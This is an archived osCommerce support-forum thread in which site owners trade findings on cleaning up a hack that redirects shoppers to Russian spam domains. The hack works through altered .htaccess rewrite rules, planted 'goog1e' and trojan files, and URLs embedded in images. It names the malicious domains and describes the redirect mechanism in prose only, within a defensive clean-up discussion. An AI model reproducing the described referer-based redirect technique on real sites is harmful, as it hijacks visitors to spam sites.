Jump to content

Archived

This topic is now archived and is closed to further replies.

rojna

redirect to spam in admin ---> kirm-ar.ru

Recommended Posts

1. Fix your site which has been hacked & lock it down so future hacks will be unsuccessful. There is a security thread which you can follow.

2. Inform Google (via webmaster tools) that your site is now cleansed (if necessary, have you checked your search results in Google?).


Help shape the future of Phoenix; join the Phoenix Club

Share this post


Link to post
Share on other sites

I now see not only is the admin affected but the store itself :(

How did this happen ??

Is this a problem with my provider or oscommerce ??

Share this post


Link to post
Share on other sites

Greg,

 

I am currently working on this same problem for a client. Look for a indox.php (careful, this is a trojan) file in your root and includes directories. Also, remove all goog1e........ files from the site.

 

Add the security contributions listed in this thread:

 

Hot to Secure your Site

 

I have not yet completely cleansed the site, there is still atleast one more occurrence I have yet to find. I will post when if I have any further revelations.

 

 

Chris


:|: Was this post helpful ? Click the LIKE THIS button :|:

 

See my Profile to learn more about add ons, templates, support plans and custom coding (click here)

Share this post


Link to post
Share on other sites

Thanks Chris

I did find some goog1e files in the catalog and images folder, but dont see a indox.php file.

Removing the goog1e.. files didnt fix the problem :(

Share this post


Link to post
Share on other sites

Greg,

 

I have 9 hours into this already, I didn't think that just removing the goog1e files would solve the problem but I was hinting to a direction to take to get started. This redirection exploit uses a back door. Secure your site and look for the problem.

 

BTW, I already deleted more than 3000 hacker files from the site I am working on currently and there are still some pending deletion.......if I can find them.

 

 

 

Chris


:|: Was this post helpful ? Click the LIKE THIS button :|:

 

See my Profile to learn more about add ons, templates, support plans and custom coding (click here)

Share this post


Link to post
Share on other sites

Ok,

 

I have found more than 600 .jpg files with the URL embedded in the image. I have removed them and the site no longer redirects customers to the hack site.

 

However, if you look at the progress bar in the bottom left of the browser, it still says it's trying to send/receive data to that domain.

 

So, I will continue to search out this monster and evict it.

 

 

Chris


:|: Was this post helpful ? Click the LIKE THIS button :|:

 

See my Profile to learn more about add ons, templates, support plans and custom coding (click here)

Share this post


Link to post
Share on other sites

I have the same problem. I haven't checked the images yet, but I did find a couple of hacked .htaccess files. These have a bunch of rewrite conditions matching HTTP_REFERER to sites like LinkedIn, FaceBook, Flickr, Google, YouTube, etc ending with a rewrite rule pointing to kirm-ar.ru.

 

I think those might be stopping me from using the file editor in cPanel to update anything. On the other hand, renaming them seems to work just fine...

Share this post


Link to post
Share on other sites

Ralph,

 

I just completed the removal of this redirect for a client. It was one of the most difficult cleanings I have done in a long time. You should look for anomalous files and check each file for malicious code. ALSO, you will need to use a tool such as GREP to look for the attack site URL that is being embedded into .jpg files. It was only after searching all files and removing any files with reference to that site, that I was able to fully clean and secure my clients website.

 

 

 

 

 

Chris


:|: Was this post helpful ? Click the LIKE THIS button :|:

 

See my Profile to learn more about add ons, templates, support plans and custom coding (click here)

Share this post


Link to post
Share on other sites

Ralph,

 

I just completed the removal of this redirect for a client. It was one of the most difficult cleanings I have done in a long time. You should look for anomalous files and check each file for malicious code. ALSO, you will need to use a tool such as GREP to look for the attack site URL that is being embedded into .jpg files. It was only after searching all files and removing any files with reference to that site, that I was able to fully clean and secure my clients website.

Chris

I got lucky, I think. Hacked .htaccess files in the user's home directory and public_html, magically reappearing favicon.ico, and goog1e* files in public_html & public_html/images. I used cPanel's backup option to make a tarball to download and verify md5sums against the original files.

 

I *think* the site is clean now.

Share this post


Link to post
Share on other sites

I got lucky, I think. Hacked .htaccess files in the user's home directory and public_html, magically reappearing favicon.ico, and goog1e* files in public_html & public_html/images. I used cPanel's backup option to make a tarball to download and verify md5sums against the original files.

 

I *think* the site is clean now.

 

I found my site had the same hack last night. I ftp the whole affected site to my local drive, and did a diff with a previous backup. I found several googxxxx files inside the images folder. Delete those files, but didn't solve the problem. I didn't find any suspicious code in .htaccess file. Later, when I checked HotLink Protection under my cPanel, I found the redirect request was set to krim-ar.ru/command/index.php. Delete this url, and the site seems back to normal. I don't know how did this hack get into my cPanel. I talked to my host support, they said the redirection was from .htaccess, but he also cannot find any malacious code in it. I am not sure if my site is completely clean now. Hopefully this can help those people who are experiencing the same problem.

Share this post


Link to post
Share on other sites

found the redirect link in the .htaccess files both in the main public_htm dir. and in the store dir. , deleted it and all seems to work again.

 

also renamed the ADMIN folder and added FWR Security Pro

Share this post


Link to post
Share on other sites

I've been fighting off this hacker for about four months now.I've wasted days and maybe weeks of time and had sites dropped from google.

All the bad sites which are redirected to are Russian and include:-

tutaanti.ru/cron/index.php

julyrelax.ru/catalog/index.php

allow-strike.ru/system/index.php

kirm-ar.ru

kirm-sky.ru

 

Since I deleted all my other scripts and under construction websites, I narrowed the problem down to OScommerce.

In the last couple of days, I've installed the SecurityPro addon and removed goog.... files.

Fingers are crossed but I'm expecting the battle to continue.

--------------------------------------------------

How does one know if a URL is embedded in an image file?

Share this post


Link to post
Share on other sites

How does one know if a URL is embedded in an image file?

 

If you can get the images to a place where you can use grep, you could try

 

grep http <image>

 

in each image.

 

I wonder if the url-embedded-in-images trick would survive the image being manipulated?? I don't have so many images yet that I couldn't simply schedule a cron job to convert from jpg to png and back. It wouldn't even be too hard to keep known clean copies of images outside the document tree and copy them over occasionally.

Share this post


Link to post
Share on other sites

×